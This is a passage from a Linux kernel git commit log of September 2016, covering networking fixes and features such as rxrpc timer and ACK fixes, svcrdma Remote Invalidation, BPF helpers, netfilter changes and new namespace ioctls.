 (4) Use ktime_add_ms() not ktime_add_ns() to add millisecond offsets.

 (5) Use before_eq() & co. to compare serial numbers (which may wrap).

 (6) Start the resend timer on DATA packet transmission.

 (7) Don't accidentally cancel a retransmission upon receiving a NACK.

 (8) Fix the call timer setting function to deal with timeouts that are now
     or past.

 (9) Don't use a flag to communicate the presence of the last packet in the
     Tx buffer from sendmsg to the input routines where ACK and DATA
     reception is handled.  The problem is that there's a window between
     queueing the last packet for transmission and setting the flag in
     which ACKs or reply DATA packets can arrive, causing apparent state
     machine violation issues.

     Instead use the annotation buffer to mark the last packet and pick up
     and set the flag in the input routines.

(10) Don't call the tx_ack tracepoint and don't allocate a serial number if
     someone else nicked the ACK we were about to transmit.

There are also new tracepoints and one altered tracepoint used to track
down the above bugs:

(11) Call timer tracepoint.

(12) Data Tx tracepoint (and adjustments to ACK tracepoint).

(13) Injected Rx packet loss tracepoint.

(14) Ack proposal tracepoint.

(15) Retransmission selection tracepoint.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:24:19 -04:00
David S. Miller
1678c1134f Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next
Steffen Klassert says:

====================
pull request (net-next): ipsec-next 2016-09-23

Only two patches this time:

1) Fix a comment reference to struct xfrm_replay_state_esn.
   From Richard Guy Briggs.

2) Convert xfrm_state_lookup to rcu, we don't need the
   xfrm_state_lock anymore in the input path.
   From Florian Westphal.

Please pull or let me know if there are problems.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:18:19 -04:00
Moshe Shemesh
79aab093a0 net: Update API for VF vlan protocol 802.1ad support
Introduce new rtnl UAPI that exposes a list of vlans per VF, giving
the ability for user-space application to specify it for the VF, as an
option to support 802.1ad.
We adjusted IP Link tool to support this option.

For future use cases, the new UAPI supports multiple vlans. For now we
limit the list size to a single vlan in kernel.
Add IFLA_VF_VLAN_LIST in addition to IFLA_VF_VLAN to keep backward
compatibility with older versions of IP Link tool.

Add a vlan protocol parameter to the ndo_set_vf_vlan callback.
We kept 802.1Q as the drivers' default vlan protocol.
Suitable ip link tool command examples:
  Set vf vlan protocol 802.1ad:
    ip link set eth0 vf 1 vlan 100 proto 802.1ad
  Set vf to VST (802.1Q) mode:
    ip link set eth0 vf 1 vlan 100 proto 802.1Q
  Or by omitting the new parameter
    ip link set eth0 vf 1 vlan 100

Signed-off-by: Moshe Shemesh <moshe@mellanox.com>
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:01:26 -04:00
Arnd Bergmann
2ed6afdee7 netns: move {inc,dec}_net_namespaces into #ifdef
With the newly enforced limit on the number of namespaces,
we get a build warning if CONFIG_NETNS is disabled:

net/core/net_namespace.c:273:13: error: 'dec_net_namespaces' defined but not used [-Werror=unused-function]
net/core/net_namespace.c:268:24: error: 'inc_net_namespaces' defined but not used [-Werror=unused-function]

This moves the two added functions inside the #ifdef that guards
their callers.

Fixes: 703286608a ("netns: Add a limit on the number of net namespaces")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
2016-09-23 13:39:43 -05:00
Christoph Hellwig
ed082d36a7 IB/core: add support to create a unsafe global rkey to ib_create_pd
Instead of exposing ib_get_dma_mr to ULPs and letting them use it more or
less unchecked, this moves the capability of creating a global rkey into
the RDMA core, where it can be easily audited.  It also prints a warning
everytime this feature is used as well.

Signed-off-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Sagi Grimberg <sagi@grimberg.me>
Reviewed-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Reviewed-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
2016-09-23 13:47:44 -04:00
David Howells
c6672e3fe4 rxrpc: Add a tracepoint to log which packets will be retransmitted
Add a tracepoint to log in rxrpc_resend() which packets will be
retransmitted.  Note that if a positive ACK comes in whilst we have dropped
the lock to retransmit another packet, the actual retransmission may not
happen, though some of the effects will (such as altering the congestion
management).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
9c7ad43444 rxrpc: Add tracepoint for ACK proposal
Add a tracepoint to log proposed ACKs, including whether the proposal is
used to update a pending ACK or is discarded in favour of an easlier,
higher priority ACK.

Whilst we're at it, get rid of the rxrpc_acks() function and access the
name array directly.  We do, however, need to validate the ACK reason
number given to trace_rxrpc_rx_ack() to make sure we don't overrun the
array.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
89b475abdb rxrpc: Add a tracepoint to log injected Rx packet loss
Add a tracepoint to log received packets that get discarded due to Rx
packet loss.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
be832aecc5 rxrpc: Add data Tx tracepoint and adjust Tx ACK tracepoint
Add a tracepoint to log transmission of DATA packets (including loss
injection).

Adjust the ACK transmission tracepoint to include the packet serial number
and to line this up with the DATA transmission display.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
fc7ab6d29a rxrpc: Add a tracepoint for the call timer
Add a tracepoint to log call timer initiation, setting and expiry.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
b86e218e0d rxrpc: Don't call the tx_ack tracepoint if don't generate an ACK
rxrpc_send_call_packet() is invoking the tx_ack tracepoint before it checks
whether there's an ACK to transmit (another thread may jump in and transmit
it).

Fix this by only invoking the tracepoint if we get a valid ACK to transmit.

Further, only allocate a serial number if we're going to actually transmit
something.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
70790dbe3f rxrpc: Pass the last Tx packet marker in the annotation buffer
When the last packet of data to be transmitted on a call is queued, tx_top
is set and then the RXRPC_CALL_TX_LAST flag is set.  Unfortunately, this
leaves a race in the ACK processing side of things because the flag affects
the interpretation of tx_top and also allows us to start receiving reply
data before we've finished transmitting.

To fix this, make the following changes:

 (1) rxrpc_queue_packet() now sets a marker in the annotation buffer
     instead of setting the RXRPC_CALL_TX_LAST flag.

 (2) rxrpc_rotate_tx_window() detects the marker and sets the flag in the
     same context as the routines that use it.

 (3) rxrpc_end_tx_phase() is simplified to just shift the call state.
     The Tx window must have been rotated before calling to discard the
     last packet.

 (4) rxrpc_receiving_reply() is added to handle the arrival of the first
     DATA packet of a reply to a client call (which is an implicit ACK of
     the Tx phase).

 (5) The last part of rxrpc_input_ack() is reordered to perform Tx
     rotation, then soft-ACK application and then to end the phase if we've
     rotated the last packet.  In the event of a terminal ACK, the soft-ACK
     application will be skipped as nAcks should be 0.

 (6) rxrpc_input_ackall() now has to rotate as well as ending the phase.

In addition:

 (7) Alter the transmit tracepoint to log the rotation of the last packet.

 (8) Remove the no-longer relevant queue_reqack tracepoint note.  The
     ACK-REQUESTED packet header flag is now set as needed when we actually
     transmit the packet and may vary by retransmission.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
01a88f7f6b rxrpc: Fix call timer
Fix the call timer in the following ways:

 (1) If call->resend_at or call->ack_at are before or equal to the current
     time, then ignore that timeout.

 (2) If call->expire_at is before or equal to the current time, then don't
     set the timer at all (possibly we should queue the call).

 (3) Don't skip modifying the timer if timer_pending() is true.  This
     indicates that the timer is working, not that it has expired and is
     running/waiting to run its expiry handler.

Also call rxrpc_set_timer() to start the call timer going rather than
calling add_timer().

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:49:19 +01:00
David Howells
be8aa33806 rxrpc: Fix accidental cancellation of scheduled resend by ACK parser
When rxrpc_input_soft_acks() is parsing the soft-ACKs from an ACK packet,
it updates the Tx packet annotations in the annotation buffer.  If a
soft-ACK is an ACK, then we overwrite unack'd, nak'd or to-be-retransmitted
states and that is fine; but if the soft-ACK is an NACK, we overwrite the
to-be-retransmitted with a nak - which isn't.

Instead, we need to let any scheduled retransmission stand if the packet
was NAK'd.

Note that we don't reissue a resend if the annotation is in the
to-be-retransmitted state because someone else must've scheduled the
resend already.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 15:35:45 +01:00
Chuck Lever
25d55296dd svcrdma: support Remote Invalidation
Support Remote Invalidation. A private message is exchanged with
the client upon RDMA transport connect that indicates whether
Send With Invalidation may be used by the server to send RPC
replies. The invalidate_rkey is arbitrarily chosen from among
rkeys present in the RPC-over-RDMA header's chunk lists.

Send With Invalidate improves performance only when clients can
recognize, while processing an RPC reply, that an rkey has already
been invalidated. That has been submitted as a separate change.

In the future, the RPC-over-RDMA protocol might support Remote
Invalidation properly. The protocol needs to enable signaling
between peers to indicate when Remote Invalidation can be used
for each individual RPC.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Reviewed-by: Sagi Grimberg <sagi@grimberg.me>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-09-23 10:18:54 -04:00
Chuck Lever
cc9d83408b svcrdma: Server-side support for rpcrdma_connect_private
Prepare to receive an RDMA-CM private message when handling a new
connection attempt, and send a similar message as part of connection
acceptance.

Both sides can communicate their various implementation limits.
Implementations that don't support this sideband protocol ignore it.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Reviewed-by: Sagi Grimberg <sagi@grimberg.me>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-09-23 10:18:54 -04:00
Chuck Lever
9995237bba svcrdma: Skip put_page() when send_reply() fails
Message from syslogd@klimt at Aug 18 17:00:37 ...
 kernel:page:ffffea0020639b00 count:0 mapcount:0 mapping:          (null) index:0x0
Aug 18 17:00:37 klimt kernel: flags: 0x2fffff80000000()
Aug 18 17:00:37 klimt kernel: page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)

Aug 18 17:00:37 klimt kernel: kernel BUG at /home/cel/src/linux/linux-2.6/include/linux/mm.h:445!
Aug 18 17:00:37 klimt kernel: RIP: 0010:[<ffffffffa05c21c1>] svc_rdma_sendto+0x641/0x820 [rpcrdma]

send_reply() assigns its page argument as the first page of ctxt. On
error, send_reply() already invokes svc_rdma_put_context(ctxt, 1);
which does a put_page() on that very page. No need to do that again
as svc_rdma_sendto exits.

Fixes: 3e1eeb9808 ("svcrdma: Close connection when a send error occurs")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-09-23 10:18:53 -04:00
Chuck Lever
cace564f8b svcrdma: Tail iovec leaves an orphaned DMA mapping
The ctxt's count field is overloaded to mean the number of pages in
the ctxt->page array and the number of SGEs in the ctxt->sge array.
Typically these two numbers are the same.

However, when an inline RPC reply is constructed from an xdr_buf
with a tail iovec, the head and tail often occupy the same page,
but each are DMA mapped independently. In that case, ->count equals
the number of pages, but it does not equal the number of SGEs.
There's one more SGE, for the tail iovec. Hence there is one more
DMA mapping than there are pages in the ctxt->page array.

This isn't a real problem until the server's iommu is enabled. Then
each RPC reply that has content in that iovec orphans a DMA mapping
that consists of real resources.

krb5i and krb5p always populate that tail iovec. After a couple
million sent krb5i/p RPC replies, the NFS server starts behaving
erratically. Reboot is needed to clear the problem.

Fixes: 9d11b51ce7 ("svcrdma: Fix send_reply() scatter/gather set-up")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-09-23 10:18:52 -04:00
Daniel Wagner
5690a22d86 xprtrdma: use complete() instead complete_all()
There is only one waiter for the completion, therefore there
is no need to use complete_all(). Let's make that clear by
using complete() instead of complete_all().

The usage pattern of the completion is:

waiter context                          waker context

frwr_op_unmap_sync()
  reinit_completion()
  ib_post_send()
  wait_for_completion()

					frwr_wc_localinv_wake()
					  complete()

Signed-off-by: Daniel Wagner <daniel.wagner@bmw-carit.de>
Cc: Anna Schumaker <Anna.Schumaker@Netapp.com>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Cc: Chuck Lever <chuck.lever@oracle.com>
Cc: linux-nfs@vger.kernel.org
Cc: netdev@vger.kernel.org
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-23 09:48:24 -04:00
David Howells
dfc3da4404 rxrpc: Need to start the resend timer on initial transmission
When a DATA packet has its initial transmission, we may need to start or
adjust the resend timer.  Without this we end up relying on being sent a
NACK to initiate the resend.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 14:05:12 +01:00
David Howells
98dafac569 rxrpc: Use before_eq() and friends to compare serial numbers
before_eq() and friends should be used to compare serial numbers (when not
checking for (non)equality) rather than casting to int, subtracting and
checking the result.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 14:05:08 +01:00
Daniel Borkmann
7a4b28c6cc bpf: add helper to invalidate hash
Add a small helper that complements 36bbef52c7 ("bpf: direct packet
write and access for helpers for clsact progs") for invalidating the
current skb->hash after mangling on headers via direct packet write.

Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:40:28 -04:00
Daniel Borkmann
669dc4d76d bpf: use bpf_get_smp_processor_id_proto instead of raw one
Same motivation as in commit 80b48c4457 ("bpf: don't use raw processor
id in generic helper"), but this time for XDP typed programs. Thus, allow
for preemption checks when we have DEBUG_PREEMPT enabled, and otherwise
use the raw variant.

Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:40:28 -04:00
Daniel Borkmann
2d48c5f933 bpf: use skb_to_full_sk helper in bpf_skb_under_cgroup
We need to use skb_to_full_sk() helper introduced in commit bd5eb35f16
("xfrm: take care of request sockets") as otherwise we miss tcp synack
messages, since ownership is on request socket and therefore it would
miss the sk_fullsock() check. Use skb_to_full_sk() as also done similarly
in the bpf_get_cgroup_classid() helper via 2309236c13 ("cls_cgroup:
get sk_classid only from full sockets") fix to not let this fall through.

Fixes: 4a482f34af ("cgroup: bpf: Add bpf_skb_in_cgroup_proto")
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:40:27 -04:00
Vivien Didelot
732f794c1b net: dsa: add port fast ageing
Today the DSA drivers are in charge of flushing the MAC addresses
associated to a port when its STP state changes from Learning or
Forwarding, to Disabled or Blocking or Listening.

This makes the drivers more complex and hides the generic switch logic.
Introduce a new optional port_fast_age operation to dsa_switch_ops, to
move this logic to the DSA layer and keep drivers simple.

Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:38:50 -04:00
Vivien Didelot
4acfee8143 net: dsa: add port STP state helper
Add a void helper to set the STP state of a port, checking first if the
required routine is provided by the driver.

Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:38:50 -04:00
Eric Dumazet
019b1c9fe3 tcp: fix a compile error in DBGUNDO()
If DBGUNDO() is enabled (FASTRETRANS_DEBUG > 1), a compile
error will happen, since inet6_sk(sk)->daddr became sk->sk_v6_daddr

Fixes: efe4208f47 ("ipv6: make lookups simpler and faster")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 08:26:32 -04:00
David Howells
90bd684ded rxrpc: Should be using ktime_add_ms() not ktime_add_ns()
ktime_add_ms() should be used to add the resend time (in ms) rather than
ktime_add_ns().

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 13:23:09 +01:00
David Howells
c0d058c21c rxrpc: Make sure sendmsg() is woken on call completion
Make sure that sendmsg() gets woken up if the call it is waiting for
completes abnormally.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 13:23:09 +01:00
David Howells
9aff212bd6 rxrpc: Don't send an ACK at the end of service call response transmission
Don't send an IDLE ACK at the end of the transmission of the response to a
service call.  The service end resends DATA packets until the client sends an
ACK that hard-acks all the send data.  At that point, the call is complete.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 13:23:09 +01:00
David Howells
b24d2891cf rxrpc: Preset timestamp on Tx sk_buffs
Set the timestamp on sk_buffs holding packets to be transmitted before
queueing them because the moment the packet is on the queue it can be seen
by the retransmission algorithm - which may see a completely random
timestamp.

If the retransmission algorithm sees such a timestamp, it may retransmit
the packet and, in future, tell the congestion management algorithm that
the retransmit timer expired.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-23 13:17:52 +01:00
Douglas Caetano dos Santos
2fe664f1fc tcp: fix wrong checksum calculation on MTU probing
With TCP MTU probing enabled and offload TX checksumming disabled,
tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
into the probe's SKB had an odd length. This was caused by the direct use
of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
fragment being copied, if needed. When this fragment was not the last, a
subsequent call used the previous checksum without considering this
padding.

The effect was a stale connection in one way, as even retransmissions
wouldn't solve the problem, because the checksum was never recalculated for
the full SKB length.

Signed-off-by: Douglas Caetano dos Santos <douglascs@taghos.com.br>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 07:55:02 -04:00
Eric Dumazet
fefa569a9d net_sched: sch_fq: account for schedule/timers drifts
It looks like the following patch can make FQ very precise, even in VM
or stressed hosts. It matters at high pacing rates.

We take into account the difference between the time that was programmed
when last packet was sent, and current time (a drift of tens of usecs is
often observed)

Add an EWMA of the unthrottle latency to help diagnostics.

This latency is the difference between current time and oldest packet in
delayed RB-tree. This accounts for the high resolution timer latency,
but can be different under stress, as fq_check_throttled() can be
opportunistically be called from a dequeue() called after an enqueue()
for a different flow.

Tested:
// Start a 10Gbit flow
$ netperf --google-pacing-rate 1250000000 -H lpaa24 -l 10000 -- -K bbr &

Before patch :
$ sar -n DEV 10 5 | grep eth0 | grep Average
Average:         eth0  17106.04 756876.84   1102.75 1119049.02      0.00      0.00      0.52

After patch :
$ sar -n DEV 10 5 | grep eth0 | grep Average
Average:         eth0  17867.00 800245.90   1151.77 1183172.12      0.00      0.00      0.52

A new iproute2 tc can output the 'unthrottle latency' :

$ tc -s qd sh dev eth0 | grep latency
  0 gc, 0 highprio, 32490767 throttled, 2382 ns latency

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 07:19:06 -04:00
Marcelo Ricardo Leitner
a3007446e5 sctp: fix the handling of SACK Gap Ack blocks
sctp_acked() is using 32bit arithmetics on 16bits vars, via TSN_lte()
macros, which is weird and confusing.

Once the offset to ctsn is calculated, all wrapping is already handled
and thus to verify the Gap Ack blocks we can just use pure
less/big-or-equal than checks.

Also, rename gap variable to tsn_offset, so it's more meaningful, as
it doesn't point to any gap at all.

Even so, I don't think this discrepancy resulted in any practical bug.

This patch is a preparation for the next one, which will introduce
typecheck() for TSN_lte() macros and would cause a compile error here.

Suggested-by: David Laight <David.Laight@ACULAB.COM>
Reported-by: David Laight <David.Laight@ACULAB.COM>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 06:54:58 -04:00
WANG Cong
3d4357fba8 sch_sfb: keep backlog updated with qlen
Fixes: 2ccccf5fb4 ("net_sched: update hierarchical backlog too")
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 06:52:31 -04:00
WANG Cong
2ed5c3f096 sch_qfq: keep backlog updated with qlen
Reported-by: Stas Nichiporovich <stasn77@gmail.com>
Fixes: 2ccccf5fb4 ("net_sched: update hierarchical backlog too")
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 06:52:31 -04:00
WANG Cong
21641c2e1f net_sched: check NULL on error path in route4_change()
On error path in route4_change(), 'f' could be NULL,
so we should check NULL before calling tcf_exts_destroy().

Fixes: b9a24bb76b ("net_sched: properly handle failure case of tcf_exts_init()")
Reported-by: kbuild test robot <fengguang.wu@intel.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-23 06:51:49 -04:00
David S. Miller
d6989d4bbe Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net 2016-09-23 06:46:57 -04:00
Pablo Neira Ayuso
4004d5c374 netfilter: nft_lookup: remove superfluous element found check
We already checked for !found just a bit before:

        if (!found) {
                regs->verdict.code = NFT_BREAK;
                return;
        }

        if (found && set->flags & NFT_SET_MAP)
            ^^^^^

So this redundant check can just go away.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:30:48 +02:00
Gao Feng
b9d80f83bf netfilter: xt_helper: Use sizeof(variable) instead of literal number
It's better to use sizeof(info->name)-1 as index to force set the string
tail instead of literal number '29'.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:30:43 +02:00
Gao Feng
7bdc66242d netfilter: Enhance the codes used to get random once
There are some codes which are used to get one random once in netfilter.
We could use net_get_random_once to simplify these codes.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:30:36 +02:00
Liping Zhang
a20877b5ed netfilter: nf_tables: check tprot_set first when we use xt.thoff
pkt->xt.thoff is not always set properly, but we use it without any check.
For payload expr, it will cause wrong results. For nftrace, we may notify
the wrong network or transport header to the user space, furthermore,
input the following nft rules, warning message will be printed out:
  # nft add rule arp filter output meta nftrace set 1

  WARNING: CPU: 0 PID: 13428 at net/netfilter/nf_tables_trace.c:263
  nft_trace_notify+0x4a3/0x5e0 [nf_tables]
  Call Trace:
  [<ffffffff813d58ae>] dump_stack+0x63/0x85
  [<ffffffff810a4c0b>] __warn+0xcb/0xf0
  [<ffffffff810a4d3d>] warn_slowpath_null+0x1d/0x20
  [<ffffffffa0589703>] nft_trace_notify+0x4a3/0x5e0 [nf_tables]
  [ ... ]
  [<ffffffffa05690a8>] nft_do_chain_arp+0x78/0x90 [nf_tables_arp]
  [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
  [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
  [<ffffffff81732bbf>] arp_xmit+0x8f/0xb0
  [ ... ]
  [<ffffffff81732d36>] arp_solicit+0x106/0x2c0

So before we use pkt->xt.thoff, check the tprot_set first.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:30:26 +02:00
Liping Zhang
8dc3c2b86b netfilter: nf_tables: improve nft payload fast eval
There's an off-by-one issue in nft_payload_fast_eval, skb_tail_pointer
and ptr + priv->len all point to the last valid address plus 1. So if
they are equal, we can still fetch the valid data. It's unnecessary to
fall back to nft_payload_eval.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:30:16 +02:00
Liping Zhang
8061bb5443 netfilter: nft_queue: add _SREG_QNUM attr to select the queue number
Currently, the user can specify the queue numbers by _QUEUE_NUM and
_QUEUE_TOTAL attributes, this is enough in most situations.

But acctually, it is not very flexible, for example:
  tcp dport 80 mapped to queue0
  tcp dport 81 mapped to queue1
  tcp dport 82 mapped to queue2
In order to do this thing, we must add 3 nft rules, and more
mapping meant more rules ...

So take one register to select the queue number, then we can add one
simple rule to mapping queues, maybe like this:
  queue num tcp dport map { 80:0, 81:1, 82:2 ... }

Florian Westphal also proposed wider usage scenarios:
  queue num jhash ip saddr . ip daddr mod ...
  queue num meta cpu ...
  queue num meta mark ...

The last point is how to load a queue number from sreg, although we can
use *(u16*)&regs->data[reg] to load the queue number, just like nat expr
to load its l4port do.

But we will cooperate with hash expr, meta cpu, meta mark expr and so on.
They all store the result to u32 type, so cast it to u16 pointer and
dereference it will generate wrong result in the big endian system.

So just keep it simple, we treat queue number as u32 type, although u16
type is already enough.

Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:29:50 +02:00
Laura Garcia Liebana
36b701fae1 netfilter: nf_tables: validate maximum value of u32 netlink attributes
Fetch value and validate u32 netlink attribute. This validation is
usually required when the u32 netlink attributes are being stored in a
field whose size is smaller.

This patch revisits 4da449ae1d ("netfilter: nft_exthdr: Add size check
on u8 nft_exthdr attributes").

Fixes: 96518518cc ("netfilter: add nftables")
Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Laura Garcia Liebana <nevola@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-23 09:29:02 +02:00
Eric W. Biederman
7872559664 Merge branch 'nsfs-ioctls' into HEAD
From: Andrey Vagin <avagin@openvz.org>

Each namespace has an owning user namespace and now there is not way
to discover these relationships.

Pid and user namepaces are hierarchical. There is no way to discover
parent-child relationships too.

Why we may want to know relationships between namespaces?

One use would be visualization, in order to understand the running
system.  Another would be to answer the question: what capability does
process X have to perform operations on a resource governed by namespace
Y?

One more use-case (which usually called abnormal) is checkpoint/restart.
In CRIU we are going to dump and restore nested namespaces.

There [1] was a discussion about which interface to choose to determing
relationships between namespaces.

Eric suggested to add two ioctl-s [2]:
> Grumble, Grumble.  I think this may actually a case for creating ioctls
> for these two cases.  Now that random nsfs file descriptors are bind
> mountable the original reason for using proc files is not as pressing.
>
> One ioctl for the user namespace that owns a file descriptor.
> One ioctl for the parent namespace of a namespace file descriptor.

Here is an implementaions of these ioctl-s.

$ man man7/namespaces.7
...
Since  Linux  4.X,  the  following  ioctl(2)  calls are supported for
namespace file descriptors.  The correct syntax is:

      fd = ioctl(ns_fd, ioctl_type);

where ioctl_type is one of the following:

NS_GET_USERNS
      Returns a file descriptor that refers to an owning user names‐
      pace.

NS_GET_PARENT
      Returns  a  file descriptor that refers to a parent namespace.
      This ioctl(2) can be used for pid  and  user  namespaces.  For
      user namespaces, NS_GET_PARENT and NS_GET_USERNS have the same
      meaning.

In addition to generic ioctl(2) errors, the following  specific  ones
can occur:

EINVAL NS_GET_PARENT was called for a nonhierarchical namespace.

EPERM  The  requested  namespace  is outside of the current namespace
      scope.

[1] https://lkml.org/lkml/2016/7/6/158
[2] https://lkml.org/lkml/2016/7/9/101

Changes for v2:
* don't return ENOENT for init_user_ns and init_pid_ns. There is nothing
  outside of the init namespace, so we can return EPERM in this case too.
  > The fewer special cases the easier the code is to get
  > correct, and the easier it is to read. // Eric

Changes for v3:
* rename ns->get_owner() to ns->owner(). get_* usually means that it
  grabs a reference.

Cc: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: James Bottomley <James.Bottomley@HansenPartnership.com>
Cc: "Michael Kerrisk (man-pages)" <mtk.manpages@gmail.com>
Cc: "W. Trevor King" <wking@tremily.us>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Serge Hallyn <serge.hallyn@canonical.com>
2016-09-22 20:00:36 -05:00
Andrey Vagin
bcac25a58b kernel: add a helper to get an owning user namespace for a namespace
Return -EPERM if an owning user namespace is outside of a process
current user namespace.

v2: In a first version ns_get_owner returned ENOENT for init_user_ns.
    This special cases was removed from this version. There is nothing
    outside of init_user_ns, so we can return EPERM.
v3: rename ns->get_owner() to ns->owner(). get_* usually means that it
grabs a reference.

Acked-by: Serge Hallyn <serge@hallyn.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
2016-09-22 19:59:39 -05:00
Trond Myklebust
a6cebd41b8 SUNRPC: Fix setting of buffer length in xdr_set_next_buffer()
Use xdr->nwords to tell us how much buffer remains.

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-22 17:17:47 -04:00
Trond Myklebust
ace0e14f4f SUNRPC: Fix corruption of xdr->nwords in xdr_copy_to_scratch
When we copy the first part of the data, we need to ensure that value
of xdr->nwords is updated as well. Do so by calling __xdr_inline_decode()

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-22 17:12:31 -04:00
Eric W. Biederman
df75e7748b userns: When the per user per user namespace limit is reached return ENOSPC
The current error codes returned when a the per user per user
namespace limit are hit (EINVAL, EUSERS, and ENFILE) are wrong.  I
asked for advice on linux-api and it we made clear that those were
the wrong error code, but a correct effor code was not suggested.

The best general error code I have found for hitting a resource limit
is ENOSPC.  It is not perfect but as it is unambiguous it will serve
until someone comes up with a better error code.

Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
2016-09-22 13:25:56 -05:00
Linus Torvalds
f887c21e21 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:
 "Mostly small bits scattered all over the place, which is usually how
  things go this late in the -rc series.

